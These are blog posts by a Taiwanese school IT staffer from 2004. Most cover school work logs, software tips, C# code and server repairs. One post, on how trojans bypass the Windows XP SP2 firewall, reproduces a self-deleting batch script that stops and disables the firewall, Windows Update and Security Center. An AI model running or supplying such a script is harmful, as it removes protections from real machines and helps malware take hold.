• 全縣國中小英語話劇比賽協助攝影


• 段考平時成績整理。

木馬繞過 Windows XP SP2 防火牆的方法

其實內建防火牆可以簡單的用 net stop 來加以 Disable。

進而修改以下的機碼（增加例外）：

Application Exceptions:
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParameters
FirewallPolicyStandardProfileAuthorizedApplicationsList

Port Exceptions:
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParameters
FirewallPolicyStandardProfileGloballyOpenPortsList

[[MORE]]
這裡附上一個批次檔（來自 GovernmentSecurity.org討論區）：
KillFirewall.bat


@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
DEL "%Temp%.kill.reg"
DEL %0


Google Desktop Search

Google 實在是一個充滿活力與創意的公司，屢屢發表新作品，總能讓人眼睛一亮。

比如說本月 14 日剛推出了一個叫 Google Desktop Search 的工具，他可以讓你搜尋個人電腦中的 Outlook / Outlook Express 信件、Word 文件、AOL Instant Messenger 聊天記錄、 Excel 資料、Internet Explorer 曾經瀏覽過的網頁及歷史紀錄、PowerPoint 投影片、及各式純文字資料。而且就像你在網路上用 Google 一樣的方便與迅速。

當然也有高手提供了 Google Desktop Search 繁體中文版，對英文有恐懼的人可以抓回去試試看。（驗證碼：MD5: 2d4b745204680abc0d6c16c2da019d3d）

目前這套工具已經成為我工作用電腦必裝的東西，因為我自己的文件實在很多，常常要找半天。裝了這個軟體，它會在電腦閒置的時候，對電腦中的文件作索引，所以感覺搜尋速度非常快，當然比 Windows 系統內建的搜尋工具要快上幾百倍。

中文網路上也有一些人已經發表了不少對這個軟體的評論，大家可以參考看看。

• 以Web為本的Google Desktop Search


• 中文化的 Google Desktop Search 版本

041019工作紀要

• 一年一度的健康檢查


• 國文科教學演示 協助攝影


• 國文科教學演示 協助單槍播放


• TODO: 單槍經借用後，遺失延長線一條，正追查中。


• 段考成績計算與登錄。


• 照片掃瞄及新聞上網。


• 週四跳舞時代電影放映及座談會的新聞稿整理，已經發給中央社，週四可以在各大報刊看到。


• 有不速之客侵入我們的網站，正在追查中。

好猛的廣告信

剛剛要關機前突然看到一個郵件系統的記錄：

Oct 15 21:07:08 power postfix/smtpd[60640]: ADF4E2EE53: reject: RCPT from arc-relay1.arc.nasa.gov[128.102.31.194]: 450 : User unknown in local recipient table; from=<> to= proto=ESMTP helo=
Oct 15 21:07:10 power postfix/smtpd[60640]: disconnect from arc-relay1.arc.nasa.gov[128.102.31.194]

好厲害，從美國太空總署 NASA 寄出來的廣告信/病毒信耶...
不過當場被我們的伺服器擋下來了，很不給面子啊！

041015 工作紀要

• 整理大量新聞資料，並將之上網。


• 繼續處理「跳舞時代」的宣傳事宜。


• 電腦閱卷讀卡機教學


• 決定今年大學榜單上網，並處理格式的問題。


• 監考


• 資訊科能力競試培訓開始。目前只有劉俊麟一個人參賽，如果還有人願意報名，請盡快聯絡我。


• 運動會秩序冊封面設計

電腦閱卷讀卡機故障已修復

教師電腦室之電腦閱卷讀卡機故障，經聯絡廠商之後，推論可能是微動裝置故障，他們將請技術人員南下維修。

但今天早上突然又可以用了，所以暫時可以省下一筆維修費用。更重要的是，段考暫時不會受到影響。

跳舞時代海報公布

跳舞時代是金馬獎最佳紀錄片，在 93 年 10 月 21 日晚間 7:00 ~ 10:00 將於校內正心堂放映，屆時該片兩位導演都會到場參與座談，請大家告訴大家。

海報已經張貼於聖心樓及初中導師室前布告欄。

Cisco access-list 更改

本校對外的 access-list 做了個重要的修改，就是除掉 access-list 的簡易防火牆。（使用 clear access-list 135)

清除的內容如下：

access-list 135 permit ip any 163.27.230.0 0.0.0.255
access-list 135 permit ip 163.27.230.0 0.0.0.255 any
access-list 135 permit ip any 163.27.240.0 0.0.0.63
access-list 135 permit ip 163.27.240.0 0.0.0.63 any
access-list 135 deny icmp any any
access-list 135 deny udp any any eq tftp
access-list 135 deny udp any any range snmp snmptrap
access-list 135 deny tcp any any range 135 139
access-list 135 deny udp any any range 135 netbios-ss
access-list 135 deny udp any any eq 445
access-list 135 deny tcp any any eq 445
access-list 135 permit ip any any

這個部分主要是用來檔微軟的病毒用的（例如疾風病毒），但這類病毒現在比較少了，所以將限制拿掉。以後若有類似的病毒出現，將改以防火牆搭配個人用防火牆互相搭配使用來防堵。

BBS 又掛了

BBS 真是多災多難，現在又掛了。
看起來是 IDE 硬碟的問題，每次都壞不同的地方，年紀太大了嗎？

FirefoxIE

FirefoxIE 是一個教你把 Firefox 的外觀改得跟 IE 一模一樣的網站。呃... 好像沒什麼用，不過也許可以利用這種方式推廣 Firefox。

新電腦教室 A

電腦教室 A 將於本月中開始更新軟硬體，舊的電腦設備將移往對面的語言教室，將來作為語言教材之用。

電腦教室 A 保留舊有的桌子，拆除底下的鍵盤架（因多數已經毀損），屆時該教室將使用 17 吋液晶螢幕，所以鍵盤直接放在桌面上仍有足夠的空間。網路線材與交換式集線器亦同時更換，以避免老舊線路拖慢網路速度。

原 14 吋 CRT 螢幕部分移往電腦教室 B 作為更替之用（有不少螢幕已經因為老舊出現色彩不平衡的狀況），其餘亦移入語言教室中。

新作業系統採用隨機的 Windows XP pro，上面安裝的軟體多為自由軟體或部分全校授權軟體。廣播系統也更新，至於還原卡則採用大漢天威卡 3.0 版，可於主控端遠端遙控開機、關機、還原。未來新教室將可提供更方便的管理。

.Net 網站

提供幾個不錯的 .Net 網站資源：

• Matthew Reynolds' .Net 247


• C# Open Source

程式修正 - 呼叫其他程式

上次提到的 C# 呼叫其他應用程式的方式一直會出現問題，會出現這樣的錯誤：

An unhandled exception of type 'System.ComponentModel.Win32Exception'

[[MORE]]
我改用這樣的方法來寫就解決了，這個例子是連線網路磁碟機的作法（請注意其中的斜線）：


using System;
using System.Diagnostics;

namespace DefaultNamespace
{
class MainClass
{
public static void Main(string[] args)
{
ProcessStartInfo pc=new ProcessStartInfo();

pc.FileName = "net";
pc.Arguments = "use m: \some_pc\share";
System.Diagnostics.Process.Start(pc);
}
}
}


Mozilla Firefox 1.0PR 更新

Mozilla Firefox 1.0PR （搶鮮版）被發現一個安全漏洞。
「惡意的網頁可能誘導使用者試圖儲存檔案但實際上卻刪除了下載目錄中的檔案」，請使用者務必更新。

所有更新資訊可以在中文版網站找到。
另外，Firefox 0.10.1 也已經推出了。

DOS Box

DOSBox
DOSBox emulates an Intel x86 PC, complete with sound, graphics, mouse, (modem)?, etc., necessary for running many old DOS games that simply cannot be run on modern PCs and operating systems, such as Microsoft Windows 2000, Windows XP, Linux and FreeBSD. However, it is not restricted to running only games. In theory, any DOS application should run in DOSBox, but the emphasis has been on getting DOS games to run smoothly, which means that communication, networking and printer support are still in early developement.

FreeDOS
The goal of the FreeDOS Project is to create a free implementation of MS-DOS. DOS is a popular system, and there is plenty of hardware out there that supports DOS. The FreeDOS Project was founded in 1994 by Jim Hall.

Packet Sniffer with C#

提供兩個連結：

• Network Sniffer and Connection Analyzer (codeproject)


• Packet Sniffer in C#

041001 工作紀要

• 中區親職教育研討會協助投影


• 新電腦教室其中一部電腦已經來了，我將依據之前的規劃來安裝這台電腦，如果有任何可以建議的地方請在這裡反映，或是直接到前述網址補充。

First JPEG Virus Posted To Usenet

因為最近很忙，一直沒有空去追蹤之前公布的微軟 GDI 漏洞。
但這是一個可怕的漏洞，駭客可以將他們的程式（或被稱為 shellcode），填在一張 jpg 圖片裡面，當你用有漏洞的微軟作業系統打開那張圖片時，將會自動執行該駭客預先設定好的程式。

有可能你上網看到的任何一張圖片都是危險的，看起來毫不起眼（可能只是顯示一個點）的圖片，會在你的電腦中植入木馬、格式化你的電腦、竊取你所有上網密碼、及做到任何你想像得到的事。

現在已經有第一隻藏在 jpg 檔的病毒出現了，而且該圖片被公布在連線的新聞看板 (Usenet) 中。

以後 jpg 檔裡面藏病毒、藏木馬已經不是稀奇的事了。

First JPEG Virus Posted To Usenet

040930 工作紀要

• 劉立郡老師 Notebook 交機。


• 林慶昌教官 WebCam 交機及視訊之使用教育訓練。


• 大漢天威卡 TimeTracer 3.0 下訂，每片 699 元，共申購 65 片。


• 美術班單槍之故障排除，請大家在上課時勿過於急躁，小心插上插頭，以免針腳損壞。


• Freeware 裝機光碟合輯 beta 版整理完畢，並交予電腦公司。


• 劉育如老師之 baby 超音波照片處理完畢，祝福她生產順利。


• 錄音帶轉 CD 之教學指導。


• TODO: 大考中心之造字字型尚未處理。


• TODO: 專任電腦室 printer server 故障尚未處理。

轉換系統 由 MT 至 WP

我今天將一個 blog 系統由 MoveableType 轉換為 WordPress，覺得還蠻順暢的。
如果有需要的人，可以參考 zonble 的這篇文章。

另外，目前的 WordPress 1.2 中文版，wp-admin/edit-comments.php 這個程式的第 94 行有問題，應該改成這樣：

if (($user_level > $authordata->user_level) or ($user_login == $authordata->user_login)) {
echo "" .sprintf(__('Edit Post “%s”'), stripslashes($post_title)) ."";


感謝你們

感謝有寫給我教師節卡片的你們，除了感謝，還有一份真摯的感動存到我心裡面去了。

很用心的蔡涵茹（我一直覺得你很厲害，以後一定是自然組的翹楚啦！）、純手工卡片的唐子婷、千里迢迢回來送卡片的洪立盈、從台中回來我卻沒見到面的陳小猴、卡片畫得很漂亮的林虹君、楊斯涵、也是朋友的莊詩筠、人在外地都可以想起我的陳政佑、李信翰、陳雅君。

沒有署名的虎尾鎮家長區、台中電腦公司，謝謝你們！

還有初二心班、初二音甲、初三修班，雖然是班級卡片，但也做得很用心喔！上面如果有被我漏掉的，請先不要罵我，E-mail 跟我說一下吧～ 跟您先說聲抱歉喔！

對外網路斷線公告

時間： 10 月 6 日（週三）下午一時至四時

由於雲林縣網路中心及中華電信為了提供更優化的網路環境及維護效率，屆時將施工將原有 ADSL 改道，需斷線數小時之久，特此公告。

2004 網際網路程式設計全國大賽

可使用語言平台：Visual C++ 6.0,Visual Basic 6.0, Delphi7.0,C++Builder 9.0。

使用作業平臺: Windows XP

大致上是利用撰寫程式來回答一些複雜的問題。需組隊參加，每隊三人。

報名截止期限：93 年 10 月 31 日。
報名網址： http://contest.cc.ntu.edu.tw/npsc2004/

040925工作重點

今天課最多，但還是抽空完成幾件事情：

• 教務處會議，決定語言教室不由電腦教室直接升級，這樣在管理上會比較方便。（雖然升級比較省錢）


• 教務處會議，開始評估學籍資料電腦化的方式。直接掃瞄可以包含照片，也可以保留原貌，但缺點是無法利用關鍵字做搜索。


• 教務處會議，明年大學推甄申請，也改用填志願的方式，去決定錄取的順序。


• 劉立郡老師 Notebook 採購及設定，很可惜寄來的不是他原本希望的金香檳色。


• 高中導師室 melody 網域連線設定批次檔建立（奇怪，是誰砍掉的？）。


• 中午研究所同學會，在民雄。呵呵，今天有吃到民雄鵝肉亭的鵝肉，真的讚啊！

教師節慶祝活動

今天主要是忙教師節慶祝活動。
活動中我主要負責燈光控制，雖然有一些小瑕疵，但總算活動相當成功。

晚上的敬師餐會，則用我前幾天翻拍的兩百多張老照片作為串場，大家都回憶起當年了，今天也破天荒回來了好多校友，感覺很溫馨啊！

另，整理匈牙利金髮美女的小提琴大師上課照片，立刻用快遞寄送過去給他，張世鈴老師說那是她所見過最厲害的小提琴家，可惜我沒有聽到她的演奏。

Buffer Overrun in JPEG Processing (GDI+)

Buffer Overrun in JPEG Processing (GDI+) Allows Code Execution (MS04-028)
Buffer Overrun in JPEG Processing (GDI+) Exploit
timhsu 做的 exploit jpg

翻拍畢冊舊照片

拍了兩百多張照片，主要是集中在民國六十幾年左右畢業的學生及老師們的照片。用於教師節敬師餐會。

很有看頭喔！不過我的脖子快斷掉了。

北軟大漢天威卡

北軟公司阿幸先生寄給我三片大漢天威卡 3.0 版，今天花了一早上測試的結果，對於其使用介面感到很滿意。

有幾個結論：

• 使用方便。


• 介面友善。


• 推測為半軟體式設計，所以需要作業系統灌完之後才能使用該還原功能。

其他則暫時不下評論。還原卡應該要在系統全毀（例如中毒，或遭惡意格式化）的情形下，依然能夠迅速復原成原始狀態，但這個半軟體式設計真的能夠辦得到嗎？

事情超多，快掛點了～

天啊！螞蟻！

這兩天來我已經在辦公室清掉了三窩螞蟻，其中有一窩還躲在放數位相機的防潮箱中，所以害我花了好多時間處理它。

下午做語言教室的廠商來做 demo，感覺還不錯，而且可以將舊有將淘汰的電腦教室就地升級成語言教室，這個構想很棒，會省不少錢。

但最後得依賴英文老師的善加利用這間教室。

學務處購入並點交數位產品

購入數樣資訊產品，作為教學及活動之用，由詹嘉隆老師購買，學務處長期借用，唐有餘先生保管：

• Nikon Pix 8700 數位相機


• CF 256MB 記憶卡 （Nikon 相機用）


• EN-EL1 Nikon充電電池 （Nikon 相機用）


• Sony DCR HC1000 DV 數位攝影機


• NP-FF71 充電電池 （DV 用）

備註： NP-FF71 電池大概明後天才會到，暫時不在手上。

重灌 Windows 2k/XP 的方法

因為重灌 Windows 2k/XP 之後，一堆漏洞都沒有修補，一裝完上網就會馬上淪陷。（我們校內有防火牆所以不至於，但如果在其他學術網路或商業網路的，到處都有病毒流竄）

在此提供重灌的順序，依照這個順序一定可以將後遺症降到最低：

• 拔掉網路線


• 用光碟開機重灌，將 C 槽整個刪除重建（格式化）


• 打開防火牆 （WinXP 有內建，Win2k 建議用 ZoneAlarm）


• 插上網路線


• Windows Update 更新所有重大更新


• 裝上 Norton Antivirus 2004 （這個版本有辦法掃出所有的廣告軟體 ad-ware）


• 更新病毒碼


• 全系統掃瞄


• 安裝其他軟體及設定系統

本文提供給詹小普。

Yahoo 新聞提供 RSS 格式

這個的意思是說，以後可以直接用各種 RSS Aggregator 來收集新聞標題了，這樣非常非常方便啊！包括我的 Mozilla Firefox 上的 RSS panel 或 Sage。

Yahoo News RSS: http://tw.news.yahoo.com/rss/

Miranda-IM 超強即時傳訊軟體

Miranda-IM 是繼 Trillian 之後崛起的免費 Instant Messeger 客戶端軟體，他們的特點都是可以同時登入不同協定的 IM 網路，包括 AIM、MSN、ICQ、Jabber、IRC 等。

不過，Miranda-IM 並沒有內建 yahoo IM 的介面，本想說這應該是致命傷吧，結果發現它有 plug-in 的擴充功能，簡直五花八門，當然包括了 Yahoo Protocol。

還有許多其他有用的小功能，例如 Weather Protocol、Gmail Notifier Plugin 0.1.3.1、Buddy Pounce (adds "offline messaging" to protocols that dont have it like MSN、IRC或者生日提醒、天氣狀態等。當然不用說，改變預設音效、背景圖片、表情符號等等這些算基本能力（但新版反而不支援布景主題 theme 或 skin 功能）。加上各種 plug-in 之後，這個軟體簡直是超強！更重要的是，它是開放原始碼軟體（GPL授權）。

經過我的大量測試，認為中文部分也完全不會有問題。如果有需要同時跟不同網路的朋友聯絡時，這是一個不錯的工具。

發現台灣也有人在玩 Miranda-IM：喵之卷 （這網站不錯，列入書籤。）

另外，gaim 1.0 推出！

Windows XP SP2

使用 Windows XP 的人應該要看的報導：SP2中文版：企業該開始安裝了嗎？

由InsightExpress公司針對美國IT經理所進行的調查發現，63%的受訪者認為SP2將是有史以來最棘手的Windows升級安裝，其中還有3%的人表示「 一想到這個問題血壓就上升。」

上面這一段話剛好指明了企業對 SP2 又愛又恨的情結。SP2 使得 WinXP 的整體安全性提高了，但卻大量降低了方便度。這兩者在系統安全的領域中原本就是互相違背的。偏偏微軟 SP2 卻連自家的產品都會與之發生衝突，所以更增加了使用者的困擾。

不過我覺得在學校裡的電腦裝上 SP2 應該還不錯，以後管理上的問題會變少才對。

.NET MSN Messenger library

官方網站：.NET MSN Messenger library

引述官方網站的話：

dotMSN is a class library to make use of the MSN Messenger Service. The library is built in C# and can therefore be used by all languages the .NET environment supports. DotMSN provides an easy and consistent interface through a clean Object Oriented approach. DotMSN abstracts the low-level MSN protocol so you can quickly integrate dotMSN with your application and make direct use of MSN-connectivity. DotMSN is free and can be used in both non-commercial and commercial applications. The library can, among other things, be used for:

* MSN bots
* Sending application-notifies
* Self-made clients / webclients
* Integrating contact info with your application

不過它是使用 MSNP8 的，略舊。

本校 MySQL 資料庫的流量統計

最近 45 天來，本校 MySQL 的存取 (query) 狀況是：

• 總共 13,301,363


• 每小時 12,131.45


• 每分鐘 202.19


• 每秒 3.37

平均每秒將近 4 個 query，應該算是大型網站的流量了吧。
改天再來公布網頁平均流量，數字也很恐怖。

jabberd 成功啟動

這次我改用 ports 安裝，指令是：

cd /usr/ports/net/jabberd ; make -DWITH_MYSQL install

這樣就可以把 MySQL 支援編進去了。
FreeBSD 下的 jabberd 版本是 2.0.3，來源是：http://www.jabberstudio.org/

我用的 client 端軟體則是現在受到好評的 Miranda-IM，一切正常。

接下來的工作是，將學校的行政人員加入 jabberd 的資料庫中。

jabberd2 的測試

我已經把 jabberd2 裝起來了，準備使用 MySQL 認證及儲存檔案，但很不幸 server 無法正常啟動：

ERROR: c2s died. Shutting down server.
JBRD: Got a signal... pass it on.
JBRD: It was a TERM. Shut it all down!

[[MORE]]
資料庫 jabberd2 及其內的 table 也都有正常建立，c2s.xml 跟 sm.xml 也都有設定好。
我想錯誤應該是發生在這裡：

Sep 15 17:56:52 power jabberd/resolver[47904]: connection attempt to router failed: Connection refused (61)
Sep 15 17:56:52 power jabberd/c2s[47907]: no such auth module 'mysql'
Sep 15 17:56:52 power jabberd/resolver[47904]: shutting down
Sep 15 17:56:52 power jabberd/router[47903]: loaded user table (1 users)
Sep 15 17:56:52 power jabberd/router[47903]: [0.0.0.0, port=5347] listening for incoming connections

參考資料：http://www.jabberdoc.org/FrontPage

Windows中毒 用念的給你聽

來自 CNET 的新聞。
不過我的電腦沒有喇叭，如果中毒的話，我就聽不到語音了，真可惜。
[[MORE]]

一隻內含語音訊息的病毒專門攻擊Windows用戶。

Amus病毒發源地可能在土耳其，它使用了 Windows的語音引擎來播放以下資訊：「 你好。我又回來了。我的名字是Hamsi先生。我正在窺視你。哈哈。你必須來土耳其。我正在清洗你的電腦。5，4，3，2，1。Gule gule。」

Gule gule在土耳其語是「再見」的意思。

這種病毒在Windows XP啟動音樂播放完畢後發作，它還會刪除一些檔案，導致Windows啟動失敗。

Amus病毒透過電子郵件自動進行傳播，這些病毒郵件的名稱可能為「Listen and Smile」，它還會修改IE瀏覽器的首頁設定。

F-Secure病毒防治機構的Mikko Hypponen表示：「用戶可能會搞不清楚狀況，因為它會說"我正在看你"」F-Secure防毒公司研究總監Mikko Hypponen表示，「雖然這種病毒可以發聲，但它並不先進，它用的是Visual Basic語言寫成的。」

防毒公司對這種病毒的危險程度評為「低」。

衛星雲圖連結更正

正心首頁上的 天氣模組，裡面的衛星雲圖連結本來是錯誤的，現在已經更正了。

BBS 穩定運轉中

硬碟昨天裝上去之後，將備份資料放回後，目前暫時又穩定運轉了。
不知道能撐多久，也許過個兩三天之後還沒掛的話，就可以正式公布 BBS 復站了。

BBS 再換一顆新硬碟

BBS 現在死馬當活馬醫，再度換一個新 SCSI 硬碟。

這是一個 18GB 的 SCSI 硬碟，再度從學校的總機系統上面 A 下來的。現在我已經掛上去了，請把妹聖者 Kudo 大神把資料放回去試試看。也許晚上就可以重新運轉了。

Instant Messanger

有點想發展校內自己的 Instant Messanger 系統，不過有點曠日廢時。
目前有現成的 Open Source 軟體：

Server：Jabber
Client： Trillian 或 Trillian Pro、Miranda-im、HELIUM IM (C#寫的) 或頗負盛名的 gaim。

新生電子信箱及網路硬碟已建立

本年度的新生帳號已經建立完畢。

每個人都有 12MB 的網頁空間及 20MB 的郵件空間，並可因特殊任務需求而申請提高。

你將可以使用同一組帳號密碼 1. 收發電子郵件 2. 設計個人網站 3. 儲存自己的檔案（網路硬碟或 ftp） 4. 交換檔案、分享作業 5. 設計unix程式 6. 遠端登入unix系統 7. 使用 MySQL 資料庫（另外申請）

你的帳號及密碼，由於網路安全的關係，並不會直接在這裡公布，請向自己的電腦老師詢問。

Google 推出「新聞」功能

每次出手都會讓人眼睛一亮的 Google，現在又推出了新聞功能，而且含有中文介面，可以搜尋所有的中文新聞。

非常厲害的一個功能，大家可以試試。不過我搜尋正心竟然發現一個我不知道的新聞，而且...默哀三分鐘。

密碼學領域重大發現

密碼學領域重大發現：
山東大學王小雲教授成功破解MD5

BBS 機器

Kudo 大神貢獻了一台 pentium 等級的機器，在按下 turbo 之後可以跑到 133 MHz 的好機器，要服務我們廣大的 bbs 用戶。
不過遺憾的是，它是使用舊式鍵盤（非 ps2 的大接頭），我正好沒有那種鍵盤，所以只能開機然後期望不會出現問題。
結果還是開不起來，這次連 kernel 都找不到了。

我又偷拿了一部電腦教室的電腦來裝 bbs，先拔掉看門狗的牙，再除掉廣播系統，可惜這次還是一樣。

下個禮拜我會再請電腦公司送一個 SCSI 硬碟過來，因為我決定從頭再找一次原因。也許，新的硬碟或新的卡也是壞的。 現在正強烈的懷疑這件事。

無論如何，感謝把妹聖者 Kudo 大神的熱心奉獻，只要多一兩個人這麼熱心，咱們的 bbs 就不會這麼久無法修復了。

MSN bot

最近三天我在研究 MSN 聊天機器人，主要是由
maldivianunderground 所開發的這一隻 Blobsy 機器人，他們也提供論壇給使用者互相討論。這一隻機器人是純粹用 php 所寫成，搭配 MySQL 可以記錄該機器人的上線狀態，技術方面採用 MSNP9 的協定來處理通訊資料，並且使用 GPL 授權、開放原始碼。

不過這三天測試下來，一直沒辦法讓機器人實際上線，新版的 php 是幾乎完全沒辦法執行，舊一點的 php 版本則會執行到一半停住，不過我都是在 FreeBSD 下執行的，也許應該找個 Linux 或 Windows 平台來測試。

我也試過那個 perl module msn bot，結果是 connection refused。真苦。有經驗的人看能不能提供一些建議給我吧！

相關連結：

• zonble：msn 聊天機器人


• Tat's Trivia Bot download


• messengeraddicts


• MSN 聊天机器人颁奖典礼


• Perl MSN Messenger Client


• Wiredbots


• Mess with MSN messanger

雜事好多

雜事實在太多，有點負荷不了，今天加班到九點半。

組好一台電腦、灌好另一台電腦、修好再另一台電腦。

美術班長期借用一台單槍投影機

美術班長期借用單槍一部，由王怡文老師負責保管。

Windows Forms Programming with C#

Windows Forms Programming 實作手冊 - 使用 C#

這是我現在正在看的書，Erik Brown 著，由 Manning 出版，國內是博碩文化/張世敏翻譯的。
在 Amazon 是被評價為五星級的好書，我看了之後也覺得不錯，不過建議先看過我之前推薦的入門書籍，再來看這一本會比較能夠融會貫通。

畢竟未學走先學跑是跑不起來的，先把文字介面的語法都弄懂了，再來碰視窗介面的程式設計會比較好。

如何呼叫遠端主機的應用程式？

使用 WMI：Windows Management Instrumentation

看門狗一直搞不定

目前示範用系統已經灌好了，可是一直沒辦法 apply 看門狗的還原機制到系統上面，也許是因為看門狗的版本太舊？不支援 XP？
所以電腦教室B全面使用 WinXP 還要再延一段時間了。

用程式呼叫瀏覽器打開某個網頁

當然網頁可以換成其他 URL 或本地檔案。
[[MORE]]

string target= "http://tw.yahoo.com";

try
{
System.Diagnostics.Process.Start(target);
}
catch(System.ComponentModel.Win32Exception noBrowser)
{
if (noBrowser.ErrorCode==-2147467259)
MessageBox.Show("瀏覽器錯誤:"+noBrowser.Message);
}
catch (System.Exception other)
{
MessageBox.Show("錯誤訊息:"+other.Message);
}


修改一下，變成以下的內容：



System.Diagnostics.Process myProcess = new System.Diagnostics.Process();

myProcess.StartInfo.FileName = @"C:\Program Files\Internet Explorer\Iexplore.exe";
myProcess.StartInfo.Arguments = "http://tw.yahoo.com";
myProcess.StartInfo.CreateNoWindow = true;
myProcess.Start();


連線網路磁碟機：（還沒測成功）


System.Diagnostics.Process myProcess = new System.Diagnostics.Process();

myProcess.StartInfo.FileName = @"C:\Windows\System32\net.exe";
myProcess.StartInfo.Arguments = "use \My_Server pwd /user:Username";
myProcess.StartInfo.CreateNoWindow = true;
myProcess.Start();


重灌電腦教室 B

由於電腦教室 B 很不幸的用了「使上最爛作業系統」 Windows Me，所以九成遇到的問題都是沒有原因的死當。

因此為了徹底解決，開始將該教室重灌成 Windows XP。今天工作一整天又加班到現在，大致已經快完成一台了。第一台是最慢的，後面的就可以直接拿第一台的來對拷，如此一來速度就可以快多了。

至於裡面安裝的軟體則參考了： http://wiki.shsh.ylc.edu.tw/SoftwareInPCroom 的內容。
如果有什麼意見歡迎加上去。

gallery 的計數器問題已知道原因

gallery (寫真正心) 的計數器一直停留在 1 不會增加的問題，已經知道原因了！

這是由於 gallery 採用了較複雜的計數機制：在英文版裡面會有 1 view，跟 20 views 的差別。也就是說，gallery 的「單位」會隨著數字而改變，因此也有 album 跟 albums，或 photo、photos 的差別。

但在中文化之後，英文單位的考慮反而變成一個麻煩，要經過修正之後才能順利套用中文。所以目前本校的 gallery 英文畫面是正常的，但中文的計數就會有問題。

關於這個問題我想暫時留到新的中文修正出來之後再處理。

[轉] 擅自破解防盜拷 罰

■ 記者林巧雁／台北報導

立法院臨時會昨(24)日三讀通過著作權法部分條文修正案，加重罰責，並新增「防盜拷措施」，未經授權任意破解、破壞或規避防盜措施的設備、器材、零件、技術或資訊者，將處一年以下徒刑科處新台幣2萬元以上、25萬元以下罰金。但為避免學生等不小心觸法，「僅供個人參考或合理使用」等，微罪免罰。

美國不斷施壓要求我國加強取締盜版與加重侵犯著作權罰責，美國商會日前特地拜會立法院長王金平，希望著作權法在臨時會修正通過，這次修正重點包含「海關主動查扣權」「取消意圖、非意圖營利區別」「防盜拷措施」等，都符合美方期待，預料將有助我國與美簽訂自由貿易協定。
[[MORE]]
修正案取消重製行為分成「意圖營利」「非意圖營利」的規定，只要擅自以重製方式侵害他人之著作財產權者，處三年以下有期徒刑、拘役或併科新台幣75萬元以下罰金；意圖銷售或出租而擅自以重製方法侵害他人著作財產權者，處六個月以上、五年以下有期徒刑，得併科20萬以上、200萬以下罰金。不過修法也特別明定，著作合理使用，不構成著作權侵害。

此外，也修正第91條之1，擅自以移轉所有權方法散布著作原件或其重製物而侵害他人著作財產權者，處三年以下有期徒刑、拘役，或併科50萬以下罰金。明知侵害著作財產權的重製物而散布或意圖散布而公開陳列或持有者，處三年以下有期徒刑，得併科7萬元以上、75萬元以下罰金。

但為避免青年學生影印、下載資料動輒觸法遭刑罰，修法也明定著作「僅供個人參考或合理使用」者，沒有販賣行為者不構成著作權侵害，不會處罰。

修正條文也新增海關執行職務時，發現進出口貨物外觀顯有侵害著作權之嫌者，經通知權利人及進出口人後，經認定疑似侵權貨物，海關應採暫不放行措施。

立院也作成附帶決議，要求著作權專責機關協助利用人與權利人團體，對有關著作權合理使用範圍做界定，如有關圖書館影印、教學用影印及教育機關遠距教學利用等，應於今年底前完成。

【記者李娟萍／台北報導】立法院臨時會昨 (24)日三讀通過「著作權法部分條文修正草案」，使我國著作權法制度符合國際規範，經濟部官員預期，今年秋天我國應可望自美國特別301優先觀察名單中除名。

經濟部智慧財產局官員指出，這次立法院臨時會能通過著作權法修正案，使著作權法較去年通過的修正案內容更進步，將有助於健全我國著作權的整體發展及環境。

官員說，增訂防盜拷措施保護機制，爭取我國數位產業發展的契機：規定「著作權人所採取防止盜拷的保護措施，應得到權利人的合法授權，才能加以規避或破解。」這項修正，主要在符合國內數位產業保護著作權的迫切需求，有助於達成我國「善用網際網路、發展數位產業、電子商務」的「e-Taiwan願景」。

智慧局表示，這次修法雖刪除「非意圖營利」3萬、五份、五件的條件，但並無意影響具體個案的判斷，立法說明中特別註明：「縱使是超越合理使用範圍，構成侵害，是否舉發、是否處罰，檢察官與法官仍應考量侵害的金額及數量，予以裁量」。換句話說，檢察官與法官有充分「微罪不舉」「微罪不罰」的裁量空間。

為對於「合理使用不構成侵害」，著作權法修正案也有更明確的界定，確保社會大眾利用上的法律安全性。

修正案條文特別明定：「著作僅供個人參考或合理使用者，不構成著作權的侵害」；立法院並特別附帶決議，要求：「智慧局有關協助權利人與利用人就圖書館影印、教學用影印及教育機構遠距教學的利用合理使用範圍的界定，應於93年12月31日前完成之」。未來智慧局完成上述合理使用協議後，將送全國權利人、利用人、司法檢、警單位與法院參考，利用人的利用如果在協議範圍內，不會有侵權的問題。

另一項重要的修正條文是，增訂海關對於涉嫌侵害物主動暫緩通關放行的規定，由於盜版品的跨國貿易，會使侵權規模擴大，因而賦予海關對於涉嫌侵害物暫緩通關放行的權限，對於進出口貨物外觀顯有侵害著作權之嫌者，得通知權利人於最短時間內（空運出口貨物：四小時內；空運進口及海運進出口貨物：一個工作日內）到海關協助認定。如此一來，一方面可以防止盜版品跨國貿易，另方面可確保海關通關作業的順暢及合法廠商國際貿易的權益。

【2004/08/25 經濟日報】

BBS 主機的後續消息

目前在採購新電腦教室時，已經有多估一些新電腦。規格是 Acer 的 Celeron 2.4GB 桌上型 PC，符合中信局採購的標準。至於確定的型號，要接洽廠商之後才能公布。

內建使用的作業系統是 Windows XP pro，不過當然其中有一台我會拿來改灌 FreeBSD，作為 BBS 的用途。估計要到今年底新電腦才能進來，在這之前 Kudo 說要提供他的報廢電腦出來硬撐一下。學校也有報廢電腦，但比起 Kudo 的實在差遠了，果然連強者報廢出來的電腦都還是強者。

那麼，咱們就等 Kudo 的電腦過來，應該就可以復站了。

93暑期照片整理

• 恭賀劉振忠主教晉牧十年及榮調高雄歡送會


• 93暑期游泳比賽


• 93合唱比賽


• 93詩歌朗誦

已經全部上網。

免費 1GB 郵件空間

